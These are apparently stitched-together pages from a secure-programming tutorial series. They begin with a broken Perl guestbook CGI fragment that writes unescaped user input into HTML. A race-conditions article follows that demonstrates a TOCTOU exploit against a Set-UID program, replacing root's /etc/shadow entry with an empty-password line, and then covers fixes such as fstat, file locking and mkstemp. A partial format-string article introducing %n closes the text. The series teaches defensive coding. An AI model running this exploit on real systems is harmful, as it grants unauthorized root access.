      Texte:<BR>\n<textarea name=\"texte\" rows=15 cols=70>
      </textarea><BR><input type=submit value=\"Go!\">
print "</BODY>\n";
print "</HTML>";
open (FILE,">>guestbook.html") || die ("Cannot write\n");
print FILE "Email: $email<BR>\n";
print FILE "Texte: $texte<BR>\n";
print FILE "<HR>\n";

sub ReadParse {
  my $in =shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    die "ERROR: unknown request method\n";

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    $$in{$key} .= "" if (defined($$in{$key}));
    $$in{$key} .= $val;


  return length($#in_second);

Avoiding security holes when developing an application – Part 5: race conditions


The general principle defining race conditions is the following : a process wants to access a system resource exclusively. It checks that the resource is not already used by another process, then uses it as it pleases. The race condition occurs when another process tries to use the same resource in the time-lag between the first process checking that resource and actually taking it over. The side effects may vary. The classical case in OS theory is the deadlock of both processes. More often it leads to application malfunction or even to security holes when a process wrongfully benefits from the privileges another.

What we previously called a resource can have different aspects. Most notably the race conditions discovered and corrected in the Linux kernel itself due to competitive access to memory areas. Here, we will focus on system applications and we’ll deem that the concerned resources are filesystem nodes. This concerns not only regular files but also direct access to devices through special entry points from the /dev/ directory.

Most of the time, an attack aiming to compromise system security is done against Set-UID applications since the attacker can benefit from the privileges of the owner of the executable file. However, unlike previously discussed security holes (buffer overflow, format strings…), race conditions usually don’t allow the execution of “customized” code. Rather, they benefit from the resources of a program while it’s running. This type of attack is also aimed at “normal” utilities (not Set-UID), the cracker lying in ambush for another user, especially root, to run the concerned application and access its resources. This is also true for writing to a file (i.e, ~/.rhost in which the string “+ +” provides a direct access from any machine without password), or for reading a confidential file (sensitive commercial data, personal medical information, password file, private key…)

Unlike the security holes discussed in our previous articles, this security problem applies to every application and not just to Set-UID utilities and system servers or daemons.

First example

Let’s have a look at the behavior of a Set-UID program that needs to save data in a file belonging to the user. We could, for instance, consider the case of a mail transport software like sendmail. Let’s suppose the user can both provide a backup filename and a message to write into that file, which is plausible under some circumstances. The application must then check if the file belongs to the person who started the program. It also will check that the file is not a symlink to a system file. Let’s not forget, the program being Set-UID root, it is allowed to modify any file on the machine. Accordingly, it will compare the file’s owner to its own real UID. Let’s write something like :

1     /* ex_01.c */
2     #include <stdio.h>
3     #include <stdlib.h>
4     #include <unistd.h>
5     #include <sys/stat.h>
6     #include <sys/types.h>
8     int
9     main (int argc, char * argv [])
10    {
11        struct stat st;
12        FILE * fp;
14        if (argc != 3) {
15            fprintf (stderr, "usage : %s file message\n", argv [0]);
16            exit(EXIT_FAILURE);
17        }
18        if (stat (argv [1], & st) < 0) {
19            fprintf (stderr, "can't find %s\n", argv [1]);
20            exit(EXIT_FAILURE);
21        }
22        if (st . st_uid != getuid ()) {
23            fprintf (stderr, "not the owner of %s \n", argv [1]);
24            exit(EXIT_FAILURE);
25        }
26        if (! S_ISREG (st . st_mode)) {
27            fprintf (stderr, "%s is not a normal file\n", argv[1]);
28            exit(EXIT_FAILURE);
29        }
31        if ((fp = fopen (argv [1], "w")) == NULL) {
32            fprintf (stderr, "Can't open\n");
33            exit(EXIT_FAILURE);
34        }
35        fprintf (fp, "%s\n", argv [2]);
36        fclose (fp);
37        fprintf (stderr, "Write Ok\n");
38        exit(EXIT_SUCCESS);
39    }

As we explained in our first article, it would be better for a Set-UID application to temporarily drop its privileges and open the file using the real UID of the user having called it. As a matter of fact, the above situation corresponds to a daemon, providing services to every user. Always running under the root ID, it would check using the UID instead of its own real UID. Nevertheless, we’ll keep this scheme for now, even if it isn’t that realistic, since it allows us to understand the problem while easily “exploiting” the security hole.

As we can see, the program starts doing all the needed checks, i.e. that the file exists, that it belongs to the user and that it’s a normal file. Next, it actually opens the file and writes the message. That is where the security hole lies! Or, more exactly, it’s within the lapse of time between the reading of the file attributes with stat() and its opening with fopen(). This lapse of time is often extremely short but an attacker can benefit from it to change the file’s characteristics. To make our attack even easier, let’s add a line that causes the process to sleep between the two operations, thus having the time to do the job by hand. Let’s change the line 30 (previously empty) and insert :

30        sleep (20);

Now, let’s implement it; first, let’s make the application Set-UID root. Let’s make, it’s very important, a backup copy of our password file/etc/shadow :

$ cc ex_01.c -Wall -o ex_01
$ su
# cp /etc/shadow /etc/shadow.bak
# chown root.root ex_01
# chmod +s ex_01
# exit
$ ls -l ex_01
-rwsrwsr-x 1 root  root    15454 Jan 30 14:14 ex_01

Everything is ready for the attack. We are in a directory belonging to us. We have a Set-UID root utility (here ex_01) holding a security hole, and we feel like replacing the line concerning root from the /etc/shadow password file with a line containing an empty password.

First, we create a fic file belonging to us :

$ rm -f fic
$ touch fic

Next, we run our application in the background “to keep the lead”. We ask it to write a string into that file. It checks what it has to, sleeps for a while before really accessing the file.

$ ./ex_01 fic "root::1:99999:::::" &
[1] 4426

The content of the root line comes from the shadow(5) man page, the most important being the empty second field (no password). While the process is asleep, we have about 20 seconds to remove the fic file and replace it with a link (symbolic or physical, both work) to the /etc/shadowfile. Let’s remember, that every user can create a link to a file in a directory belonging to him even if he can’t read the content, (or in /tmp, as we’ll see a bit later). However it isn’t possible to create a copy of such a file, since it would require a full read.

$ rm -f fic
$ ln -s /etc/shadow ./fic

Then we ask the shell to bring the ex_01 process back to the foreground with the fg command, and wait till it finishes :

$ fg
./ex_01 fic "root::1:99999:::::"
Write Ok

Voilà ! It’s over, the /etc/shadow file only holds one line indicating root has no password. You don’t believe it ?

$ su
# whoami
# cat /etc/shadow

Let’s finish our experiment by putting the old password file back :

# cp /etc/shadow.bak /etc/shadow
cp: replace `/etc/shadow'? y

Let’s be more realistic

We succeeded in exploiting a race condition in a Set-UID root utility. Of course, this program was very “helpful” waiting for 20 seconds giving us time to modify the files behind its back. Within a real application, the race condition only applies for a very short time. How do we take advantage of that ?

Usually, the cracker relies on a brute force attack, renewing the attempts hundreds, thousands or ten thousand times, using scripts to automate the sequence. It’s possible to improve the chance of “falling” into the security hole with various tricks aiming at increasing the lapse of time between the two operations that the program wrongly considers as atomically linked. The idea is to slow down the target process to manage the delay preceding the file modification more easily. Different approaches can help us to reach our goal :

  • To reduce the priority of the attacked process as much as possible by running it with the nice -n 20 prefix;
  • To increase the system load, running various processes that do CPU time consuming loops (like while (1););
  • The kernel doesn’t allow debugging Set-UID programs, but it’s possible to force a pseudo step by step execution sendingSIGSTOPSIGCONT signal sequences thus allowing to temporarily lock the process (like with the Ctrl-Z key combination in a shell) and then restart it when needed.

The method allowing us to benefit from a security hole based in race condition is boring and repetitive, but it really is usable ! Let’s try to find the most effective solutions.

Possible improvement

The problem discussed above relies on the ability to change an object’s characteristics during the time-lapse between two operations, the whole thing being as continuous as possible. In the previous situation, the change did not concern the file itself. By the way, as a normal user it would have been quite difficult to modify, or even to read, the /etc/shadow file. As a matter of fact, the change relies on the link between the existing file node in the name tree and the file itself as a physical entity. Let’s remember most of the system commands (rm, mv, ln, etc.) act on the file name not on the file content. Even when you delete a file (using rm and the unlink() system call), the content is really deleted when the last physical link – the last reference – is removed.

The mistake made in the previous program is considering the association between the name of the file and its content as unchangeable, or at least constant, during the lapse of time between stat() and fopen() operation. Thus, the example of a physical link should suffice to verify that this association is not a permanent one at all. Let’s take an example using this type of link. In a directory belonging to us, we create a new link to a system file. Of course, the file’s owner and the access mode are kept. The ln command -f option forces the creation, even if that name already exists :

$ ln -f /etc/fstab ./myfile
$ ls -il /etc/fstab myfile
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 /etc/fstab
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 myfile
$ cat myfile
/dev/hda5   /                 ext2    defaults,mand   1 1
/dev/hda6   swap              swap    defaults        0 0
/dev/fd0    /mnt/floppy       vfat    noauto,user     0 0
/dev/hdc    /mnt/cdrom        iso9660 noauto,ro,user  0 0
/dev/hda1   /mnt/dos          vfat    noauto,user     0 0
/dev/hda7   /mnt/audio        vfat    noauto,user     0 0
/dev/hda8   /home/ccb/annexe  ext2    noauto,user     0 0
none        /dev/pts          devpts  gid=5,mode=620  0 0
none        /proc             proc    defaults        0 0
$ ln -f /etc/host.conf ./myfile
$ ls -il /etc/host.conf myfile 
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 /etc/host.conf
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 myfile
$ cat myfile
order hosts,bind
multi on

The /bin/ls -i option displays the inode number at the beginning of the line. We can see the same name points to two different physical inodes.

In fact, we would like the functions that check and access the file to always point to the same content and the same inode. And it’s possible ! The kernel itself automatically manages this association when it provides us with a file descriptor. When we open a file for reading, the open()system call returns an integer value, that is the descriptor, associating it with the physical file by an internal table. All the reading we’ll do next will concern this file content, no matter what happens to the name used during the file open operation.

Let’s emphasize that point : once a file has been opened, every operation on the filename, including removing it, will have no effect on the file content. As long as there is still a process holding a descriptor for a file, the file content isn’t removed from the disk, even if its name disappears from the directory where it was stored. The kernel maintains the association to the file content between the open() system call providing a file descriptor and the release of this descriptor by close() or the process ends.

So there we have our solution ! We can open the file and then check the permissions by examining the descriptor characteristics instead of the filename ones. This is done using the fstat() system call (this last working like stat()), but checking a file descriptor rather than a path. To access the content of the file using the descriptor we’ll use the fdopen() function (that works like fopen()) while relying on a descriptor rather than on a filename. Thus, the program becomes :

1    /* ex_02.c */
2    #include <fcntl.h>
3    #include <stdio.h>
4    #include <stdlib.h>
5    #include <unistd.h>
6    #include <sys/stat.h>
7    #include <sys/types.h>
9     int
10    main (int argc, char * argv [])
11    {
12        struct stat st;
13        int fd;
14        FILE * fp;
16        if (argc != 3) {
17            fprintf (stderr, "usage : %s file message\n", argv [0]);
18            exit(EXIT_FAILURE);
19        }
20        if ((fd = open (argv [1], O_WRONLY, 0)) < 0) {
21            fprintf (stderr, "Can't open %s\n", argv [1]);
22            exit(EXIT_FAILURE);
23        }
24        fstat (fd, & st);
25        if (st . st_uid != getuid ()) {
26            fprintf (stderr, "%s not owner !\n", argv [1]);
27            exit(EXIT_FAILURE);
28        }
29        if (! S_ISREG (st . st_mode)) {
30            fprintf (stderr, "%s not a normal file\n", argv[1]);
31            exit(EXIT_FAILURE);
32        }
33        if ((fp = fdopen (fd, "w")) == NULL) {
34            fprintf (stderr, "Can't open\n");
35            exit(EXIT_FAILURE);
36        }
37        fprintf (fp, "%s", argv [2]);
38        fclose (fp);
39        fprintf (stderr, "Write Ok\n");
40        exit(EXIT_SUCCESS);
41    }

This time, after line 20, no change to the filename (deleting, renaming, linking) will affect our program’s behavior; the content of the original physical file will be kept.


When manipulating a file it’s important to ensure the association between the internal representation and the real content stays constant. Preferably, we’ll use the following system calls to manipulate the physical file as an already open descriptor rather than their equivalents using the path to the file :

System call Use
fchdir (int fd) Goes to the directory represented by fd.
fchmod (int fd, mode_t mode) Changes the file access rights.
fchown (int fd, uid_t uid, gid_t gif) Changes the file owner.
fstat (int fd, struct stat * st) Consults the informations stored within the inode of the physical file.
ftruncate (int fd, off_t length) Truncates an existing file.
fdopen (int fd, char * mode) Initializes IO from an already open descriptor. It’s an stdio library routine, not a system call.

Then, of course, you must open the file in the wanted mode, calling open() (don’t forget the third argument when creating a new file). More onopen() later when we discuss the temporary file problem.

We must insist that it is important to check the system calls return codes. For instance, let’s mention, even if it has nothing to do with race conditions, a problem found in old /bin/login implementations because it neglected an error code check. This application, automatically provided a root access when not finding the /etc/passwd file. This behavior can seem acceptable as soon as a damaged file system repair is concerned. On the other hand, checking that it was impossible to open the file instead of checking if the file really existed, was less acceptable. Calling /bin/login after opening the maximum number of allowed descriptors allowed any user to get root access… Let’s finish with this digression insisting in how it’s important to check, not only the system call’s success or failure, but the error codes too, before taking any action about system security.

Race conditions to the file content

A program dealing with system security shouldn’t rely on the exclusive access to a file content. More exactly, it’s important to properly manage the risks of race conditions to the same file. The main danger comes from a user running multiple instances of a Set-UID rootapplication simultaneously or establishing multiple connections at once with the same daemon, hoping to create a race condition situation, during which the content of a system file could be modified in an unusual way.

To avoid a program being sensitive to this kind of situation, it’s necessary to institute an exclusive access mechanism to the file data. This is the same problem as the one found in databases when various users are allowed to simultaneously query or change the content of a file. The principle of file locking solves this problem.

When a process wants to write into a file, it asks the kernel to lock that file – or a part of it. As long as the process keeps the lock, no other process can ask to lock the same file, or at least the same part of the file. In the same way, a process asks for a lock before reading the file content to ensure no changes will be made while it holds the lock.

As a matter of fact, the system is more clever than that : the kernel distinguishes between the locks required for file reading and those for file writing. Various processes can hold a lock for reading simultaneously since no one will attempt to change the file content. However, only one process can hold a lock for writing at a given time, and no other lock can be provided at the same time, even for reading.

There are two types of locks (mostly incompatible with each other). The first one comes from BSD and relies on the flock() system call. Its first argument is the descriptor of the file you wish to access in an exclusive way, and the second one is a symbolic constant representing the operation to be done. It can have different values : LOCK_SH (lock for reading), LOCK_EX (for writing), LOCK_UN (release of the lock). The system call blocks as long as the requested operation remains impossible. However, you can do a binary OR | of the LOCK_NB constant for the call to fail instead of staying locked.

The second type of lock comes from System V, and relies on the fcntl() system call whose invocation is a bit complicated. There’s a library function called lockf() close to the system call but not as fast. fcntl()‘s first argument is the descriptor of the file to lock. The second one represents the operation to be performed : F_SETLK and F_SETLKW manage a lock, the second command stays blocks till the operation becomes possible, while the first immediately returns in case of failure. F_GETLK consults the lock state of a file (which is useless for current applications). The third argument is a pointer to a variable of struct flock type, describing the lock. The flock structure important members are the following :

Name Type Meaning
l_type int Expected action : F_RDLCK (to lock for reading), F_WRLCK (to lock for writing) and F_UNLCK (to release the lock).
l_whence int l_start Field origin (usually SEEK_SET).
l_start off_t Position of the beginning of the lock (usually 0).
l_len off_t Length of the lock, 0 to reach the end of the file.

We can see fcntl() can lock limited portions of the file, but it’s able to do much more compared to flock(). Let’s have a look at a small program asking for a lock for reading concerning files which names are given as an argument, and waiting for the user to press the Enter key before finishing (and thus releasing the locks).

1    /* ex_03.c */
2    #include <fcntl.h>
3    #include <stdio.h>
4    #include <stdlib.h>
5    #include <sys/stat.h>
6    #include <sys/types.h>
7    #include <unistd.h>
9    int
10   main (int argc, char * argv [])
11   {
12     int i;
13     int fd;
14     char buffer [2];
15     struct flock lock;
17     for (i = 1; i < argc; i ++) {
18       fd = open (argv [i], O_RDWR | O_CREAT, 0644);
19       if (fd < 0) {
20         fprintf (stderr, "Can't open %s\n", argv [i]);
21         exit(EXIT_FAILURE);
22       }
23       lock . l_type = F_WRLCK;
24       lock . l_whence = SEEK_SET;
25       lock . l_start = 0;
26       lock . l_len = 0;
27       if (fcntl (fd, F_SETLK, & lock) < 0) {
28         fprintf (stderr, "Can't lock %s\n", argv [i]);
29         exit(EXIT_FAILURE);
30       }
31     }
32     fprintf (stdout, "Press Enter to release the lock(s)\n");
33     fgets (buffer, 2, stdin);
34     exit(EXIT_SUCCESS);
35   }

We first launch this program from a first console where it waits :

$ cc -Wall ex_03.c -o ex_03
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal…

    $ ./ex_03 myfile
    Can't lock myfile

Pressing Enter in the first console, we release the locks.

With this locking mechanism, you can prevent race conditions to directories and print queues, like the lpd daemon, using a flock() lock on the/var/lock/subsys/lpd file, thus allowing only one instance. You can also manage the access to a system file in a secure way like /etc/passwd, locked using fcntl() from the pam library when changing a user’s data.

However, this only protects from interferences with applications having correct behavior, that is, asking the kernel to reserve the proper access before reading or writing to an important system file. We now talk about cooperative lock, what shows the application liability towards data access. Unfortunately, a badly written program is able to replace file content, even if another process, with good behavior, has a lock for writing. Here is an example. We write a few letters into a file and lock it using the previous program :

$ echo "FIRST" > myfile
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another console, we can change the file :

    $ echo "SECOND" > myfile

Back to the first console, we check the “damages” :

$ cat myfile

To solve this problem, the Linux kernel provides the sysadmin with a locking mechanism coming from System V. Therefore you can only use it with fcntl() locks and not with flock(). The administrator can tell the kernel the fcntl() locks are strict, using a particular combination of access rights. Then, if a process locks a file for writing, another process won’t be able to write into that file (even as root). The particular combination is to use the Set-GID bit while the execution bit is removed for the group. This is obtained with the command :

$ chmod g+s-x myfile

However this is not enough. For a file to automatically benefit from strict cooperative locks, the mandatory attribute must be activated on the partition where it can be found. Usually, you have to change the /etc/fstab file to add the mand option in the 4th column, or typing the command :

# mount
/dev/hda5 on / type ext2 (rw)
# mount / -o remount,mand
# mount
/dev/hda5 on / type ext2 (rw,mand)

Now, we can check that a change from another console is impossible :

$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal :

    $ echo "THIRD" > myfile
    bash: myfile: Resource temporarily not available

And back to the first console :

$ cat myfile

The administrator and not the programmer has to decide to make strict file locks (for instance /etc/passwd, or /etc/shadow). The programmer has to control the way the data is accessed, what ensures his application to manages data coherently when reading and it is not dangerous for other processes when writing, as long as the environment is properly administrated.

Temporary files

Very often a program needs to temporarily store data in an external file. The most usual case is inserting a record in the middle of a sequential ordered file, which implies that we make a copy of the original file in a temporary file, while adding new information. Next theunlink() system call removes the original file and rename() renames the temporary file to replace the previous one.

Opening a temporary file, if not done properly, is often the starting point of race condition situations for an ill-intentioned user. Security holes based on the temporary files have been recently discovered in applications such as Apache, Linuxconf, getty_ps, wu-ftpd, rdist, gpm, inn, etc. Let’s remember a few principles to avoid this sort of trouble.

Usually, temporary file creation is done in the /tmp directory. This allows the sysadmin to know where short term data storage is done. Thus, it’s also possible to program a periodic cleaning (using cron), the use of an independent partition formated at boot time, etc. Usually, the administrator defines the location reserved for temporary files in the <paths.h> and <stdio.h> files, in the _PATH_TMP and P_tmpdir symbolic constants definition. As a matter of fact, using another default directory than /tmp is not that good, since it would imply recompiling every application, including the C library. However, let’s mention that GlibC routine behavior can be defined using the TMPDIR environment variable. Thus, the user can ask the temporary files to be stored in a directory belonging to him rather than in /tmp. This is sometimes mandatory when the partition dedicated to /tmp is too small to run applications requiring big amount of temporary storage.

The /tmp system directory is something special because of its access rights :

$ ls -ld /tmp
drwxrwxrwt 7 root  root    31744 Feb 14 09:47 /tmp

The Sticky-Bit represented by the letter t at the end or the 01000 octal mode, has a particular meaning when applied to a directory : only the directory owner (root ), and the owner of a file found in that directory are able to delete the file. The directory having a full write access, each user can put his files in it, being sure they are protected – at least till the next clean up managed by the sysadmin.

Nevertheless, using the temporary storage directory may cause a few problems. Let’s start with the trivial case, a Set-UID root application talking to a user. Let’s talk about a mail transport program. If this process receives a signal asking it to finish immediately, for instanceSIGTERM or SIGQUIT during a system shutdown, it can try to save on the fly the mail already written but not sent. With old versions, this was done in /tmp/dead.letter. Then, the user just had to create (since he can write into /tmp) a physical link to /etc/passwd with the name dead.letter for the mailer (running under effective UID root) to write to this file the content of the not yet finished mail (incidently containing a line “root::1:99999:::::“).

The first problem with this behavior is the foreseeable nature of the filename. You can to watch such an application only once to deduct it will use the /tmp/dead.letter file name. Therefore, the first step is to use a filename defined for the current program instance. There are various library functions able to provide us with a personal temporary filename.

Let’s suppose we have such a function providing a unique name for our temporary file. Free software being available with source code (and so for C library), the filename is however foreseeable even if it’s rather difficult. An attacker could create a symlink to the name provided by the C library. Our first reaction is to check the file exists before opening it. Naively we could write something like :

  if ((fd = open (filename, O_RDWR)) != -1) {
    fprintf (stderr, "%s already exists\n", filename);
  fd = open (filename, O_RDWR | O_CREAT, 0644);

Obviously, this is a typical case of race condition, where a security hole opens following the action from a user succeeding in creating a link to /etc/passwd between the first open() and the second one. These two operations have to be done in an atomic way, without any manipulation able to take place between them. This is possible using a specific option of the open() system call. Called O_EXCL, and used in conjunction with O_CREAT, this option makes the open() fail if the file already exists, but the check of existence is atomically linked to the creation.

By the way, the ‘x‘ Gnu extension for the opening modes of the fopen() function, requires an exclusive file creation, failing if the file already exists :

  FILE * fp;

  if ((fp = fopen (filename, "r+x")) == NULL) {
    perror ("Can't create the file.");
    exit (EXIT_FAILURE);

The temporary files permissions are quite important too. If you have to write confidential information into a mode 644 file (read/write for the owner, read only for the rest of the world) it can be a bit of a nuisance. The

   #include <sys/types.h>
    #include <sys/stat.h>

        mode_t umask(mode_t mask);

function allows us to determine the permissions of a file at creation time. Thus, following a umask(077) call, the file will be open in mode 600 (read/write for the owner, no rights at all for the others).

Usually, the temporary file creation is done in three steps :

  1. unique name creation (random) ;
  2. file opening using O_CREAT | O_EXCL, with the most restrictive permissions;
  3. checking the result when opening the file and reacting accordingly (either retry or quit).

How create a temporary file ? The

      #include <stdio.h>

      char *tmpnam(char *s);
      char *tempnam(const char *dir, const char *prefix);

functions return pointers to randomly created names.

The first function accepts a NULL argument, then it returns a static buffer address. Its content will change at tmpnam(NULL) next call. If the argument is an allocated string, the name is copied there, what requires a string of at least L-tmpnam bytes. Be careful with buffer overflows ! The man page informs about problems when the function is used with a NULL parameter, if _POSIX_THREADS or_POSIX_THREAD_SAFE_FUNCTIONS are defined.

The tempnam() function returns a pointer to a string. The dir directory must be “suitable” (the man page describes the right meaning of “suitable”). This function checks the file doesn’t exist before returning its name. However, once again, the man page doesn’t recommend its use, since “suitable” can have a different meaning according to the function implementations. Let’s mention that Gnome recommends its use in this way :

  char *filename;
  int fd;

  do {
    filename = tempnam (NULL, "foo");
    fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
    free (filename);
  } while (fd == -1);

The loop used here, reduces the risks but creates new ones. What would happen if the partition where you want to create the temporary file is full, or if the system already opened the maximum number of files available at once…


       #include <stdio.h>

       FILE *tmpfile (void);

function creates an unique filename and opens it. This file is automatically deleted at closing time.

With GlibC-2.1.3, this function uses a mechanism similar to tmpnam() to generate the filename, and opens the corresponding descriptor. The file is then deleted, but Linux really removes it when no resources at all use it, that is when the file descriptor is released, using a close()system call.

  FILE * fp_tmp;

  if ((fp_tmp = tmpfile()) == NULL) {
    fprintf (stderr, "Can't create a temporary file\n");
    exit (EXIT_FAILURE);

  /* ... use of the temporary file ... */

  fclose (fp_tmp);  /* real deletion from the system */

The simplest cases don’t require filename change nor transmission to another process, but only storage and data re-reading in a temporary area. We therefore don’t need to know the name of the temporary file but only to access its content. The tmpfile() function does it.

The man page says nothing, but the Secure-Programs-HOWTO doesn’t recommend it. According to the author, the specifications don’t guarantee the file creation and he hasn’t been able to check every implementation. Despite this reserve, this function is the most efficient.

Last, the

       #include <stdlib.h>

       char *mktemp(char *template);
       int mkstemp(char *template);

functions create an unique name from a template made of a string ending with “XXXXXX“. These ‘X’s are replaced to get an unique filename.

According to versions, mktemp() replaces the first five ‘X’ with the Process ID (PID) … what makes the name rather easy to guess : only the last ‘X’ is random. Some versions allow more than six ‘X’.

mkstemp() is the recommended function in the Secure-Programs-HOWTO. Here is the method :

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

 void failure(msg) {
  fprintf(stderr, "%s\n", msg);

 * Creates a temporary file and returns it.
 * This routine removes the filename from the filesystem thus
 * it doesn't appear anymore when listing the directory.
FILE *create_tempfile(char *temp_filename_pattern)
  int temp_fd;
  mode_t old_mode;
  FILE *temp_file;

  /* Create file with restrictive permissions */
  old_mode = umask(077);
  temp_fd = mkstemp(temp_filename_pattern);
  (void) umask(old_mode);
  if (temp_fd == -1) {
    failure("Couldn't open temporary file");
  if (!(temp_file = fdopen(temp_fd, "w+b"))) {
    failure("Couldn't create temporary file's file descriptor");
  if (unlink(temp_filename_pattern) == -1) {
    failure("Couldn't unlink temporary file");
  return temp_file;

These functions show the problems concerning abstraction and portability. That is, the standard library functions are expected to provide features (abstraction)… but the way to implement them varies according to the system (portability). For instance, the tmpfile() function opens a temporary file in different ways (some versions don’t use O_EXCL), or mkstemp() handles a variable number of ‘X’ according to implementations.


We flew over most of the security problems concerning race conditions to the same resource. Let’s remember you must never assume that two consecutive operations are always sequentially processed in the CPU unless the kernel manages this. If race conditions generate security holes, you must not neglect the holes caused by relying on other resources, such as variables shared between threads or memory segments shared using shmget(). Selection access mechanisms (semaphore, for example) must be used to avoid hard to discover bugs.


Avoiding security holes when developing an application – Part 4: format strings

Where is the danger ?

Most security flaws come from bad configuration or laziness. This rule holds true for format strings.

It is often necessary to use null terminated strings in a program. Where inside the program is not important here. This vulnerabilty is again about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough:

printf("%s", str);However, a programmer can decide to save time and six bytes while writing only:

printf(str);With “economy” in mind, this programmer opens a potential hole in his work. He is satisfied with passing a single string as an argument, which he wanted simply to display without any change. However, this string will be parsed to look for directives of formatting (%d, %g…) . When such a format character is discovered, the corresponding argument is looked for in the stack.

We will start introducing the family of printf() functions. At least, we expect everyone knows them … but not in detail, so we will deal with the lesser known aspects of these routines. Then, we will see how to get the necessary information to exploit such a mistake. Finally, we will show how all this fits together with a single example.

Deep inside format strings

In this part, we will consider the format strings. We will start with a summary about their use and we will discover a rather little known format instruction that will reveal all its mystery.

printf() : they told me a lie !

Note for non-French residents: we have in our nice country a racing cyclist who pretended for months not to have taken dope while all the other members of his team admitted it. He claims that if he has been doped, he didn’t know it. So, a famous puppet show used the French sentence “on m’aurait menti !” which gave me the idea for this title.

Let us start with what we all learned in our programming’s handbooks: most of the input/output C functions use data formatting, which means that one has not only to provide the data for reading/writing, but also how it shold be displayed. The following program illustrates this:

/* display.c */
#include <stdio.h>

main() {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);

Running it displays:

>>gcc display.c -o display
int  : 64 97
char : @ a

The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), which leads for a to display its ASCII value. On the other hand, the second printf() converts the integer variable i to the corresponding ASCII character code, that is 64.

Nothing new – everything conforms to the many functions with a prototype similar to the printf() function :

  1. one argument, in the form of a character string (const char *format) is used to specify the selected format;
  2. one or more other optional arguments, containing the variables in which values are formatted according to the indications given in the previous string.

Most of our programming lessons stop there, providing a non exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to force the precision…) But, there is another one never talked about:%n. Here is what the printf()‘s man page says about it:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Here is the most important thing of this article: this argument makes it possible to write into a pointer variable , even when used in a display function !

Before continuing, let us say that this format also exists for functions from the scanf() and syslog() family.

Time to play

We are going to study the use and the behavior of this format through small programs. The first, printf1, shows a very simple use:

/* printf1.c */
1: #include <stdio.h>
3: main() {
4:   char *buf = "0123456789";
5:   int n;
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }

The first printf() call displays the string “0123456789” which contains 10 characters. The next %n format writes this value to the variable n:

>>gcc printf1.c -o printf1
n = 10

Let’s slightly transform our program by replacing the instruction printf() line 7 with the following one:

7:   printf("buf=%s%n\n", buf, &n);

Running this new program confirms our idea: the variable n is now 14, (10 characters from the buf string variable added to the 4 characters from the “buf=” constant string, contained in the format string itself).

So, we know the %n format counts every character that appears in the format string. Moreover, as we will demonstrate the printf2 program, it counts even further:

/* printf2.c */

#include <stdio.h>

main() {
  char buf[10];
  int n, x = 0;

  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);

The use of the snprintf() function is to prevent from buffer overflows. The variable n should then be 10:

>>gcc printf2.c -o printf2
l = 9
n = 100

Strange ? In fact, the %n format considers the amount of characters that should have been written. This example shows that truncating due to the size specification is ignored.

What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:

/* printf3.c */

#include <stdio.h>

main() {
  char buf[5];
  int n, x = 1234;

  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, sizeof buf);

printf3 contains some differences compared to printf2:

  • the buffer size is reduced to 5 bytes
  • the precision in the format string is now set to 5;
  • the buffer content is finally displayed.

We get the following display:

>>gcc printf3.c -o printf3
l = 4
n = 5
buf = [0123] (5)

The first two lines are not surprising. The last one illustrates the behavior of the printf() function :

  1. the format string is deployed, according to the commands1 it contains, which provides the string “00000“;
  2. the variables are written where and how they should, which is illustrated by the copying of x in our example. The string then looks like “01234“;
  3. last, sizeof buf - 1 bytes2 from this string is copied into the buf destination string, which give us “0123

This is not perfectly exact but reflects the general process. For more details, the reader should refer to the GlibC sources, and particularlyvfprintf() in the ${GLIBC_HOME}/stdio-common directory.

Before ending with this part, let’s add that it is possible to get the same results writing in the format string in a slightly different way. We previously used the format called precision (the dot ‘.’). Another combination of formatting instructions leads to an identical result: 0n, where nis the the number width , and 0 means that the spaces should be replaced with 0 just in case the whole width is not filled up.

Now that you know almost everything about format strings, and most specifically about the %n format, we will study their behaviors.

The stack and printf()

Walking through the stack

The next program will guide us all along this section to understand how printf() and the stack are related:

/* stack.c */
 1: #include <stdio.h>
 3: int
 4  main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }

This program just copies an argument into the buffer character array . We take care not to overflow some important data (format strings are really more accurate than buffer overflows ;-)

>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)

It works as we expected :) Before going further, let’s examine what happens from the stack point of view while calling snprintf() at line 8.

Fig. 1 : the stack at the beginning of snprintf()

